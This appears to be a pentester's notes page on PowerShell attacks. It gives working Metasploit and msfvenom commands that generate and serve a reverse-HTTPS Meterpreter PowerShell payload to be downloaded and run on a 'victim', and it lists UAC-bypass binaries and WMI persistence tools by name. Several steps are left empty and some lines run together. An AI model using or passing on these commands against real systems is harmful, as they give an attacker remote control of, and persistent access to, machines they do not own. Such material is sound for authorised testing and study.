Misc Powershell Playground
Powershell with Metasploit + psh payload + Meterpreter
Step 1: Multi Handler in Metasploit
# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit -jStep 2: Generate PS Script payload using Msfvenom
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=x.x.x.x LPORT=443 -f psh-reflection > payload.ps1Step 3: Serve the payload
python -m SimpleHttpServer 80Step 4: Download and Run on victim
Empire Agent shell to Metasploit Meterpreter
Step 1: Metasploit multi script
Step 2:
UAC Bypass
msconfig.exe
compmgmtlauncher.exe (mmc.exe)
UAC_Bypass.ps1 (Not work anymore)
WMI for Persistence
Get-WmiObject
Invoke-WmiMethod
PowerLurk
Last updated